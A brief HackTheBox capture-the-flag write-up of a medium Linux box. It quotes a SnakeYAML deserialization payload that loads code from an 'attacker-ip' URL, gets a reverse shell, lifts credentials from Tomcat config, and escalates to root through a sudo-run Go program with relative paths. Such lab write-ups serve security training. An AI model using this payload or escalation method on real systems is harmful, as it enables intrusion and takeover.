Medium Linux box from HackTheBox.

On rustscan:

• port 22
• port 8080 are open.

checking port 8080 which hosting webpage allow yaml parsing.

I found article related to yaml parsing. https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858

!!javax.script.ScriptEngineManager [
		!!java.net.URLClassLoader [[
			!!java.net.URL ["http://attacker-ip/"]
		]]
]

It request our python server for some files. we used this exploit to send reverse shell. https://github.com/artsploit/yaml-payload using this we get shell of tomcat.

It’s running on tomcat so let’s find it configuration. reading tomcat config file we get credentials admin:whythereisalimit

After doing ssh we are now admin user. we get #user-txt

after checking sudo -l.
we find that we can run sudo with index.go without password.
if we check file index.go we see that path is not properly specified completely for main.wasm and deploy.sh.

Let’s create main.wasm which returns 1 as a value of info function using https://mbebenita.github.io/WasmExplorer/

In deploy.sh let’s put a reverse shell. We got a reverse shell as a root user we got #root-txt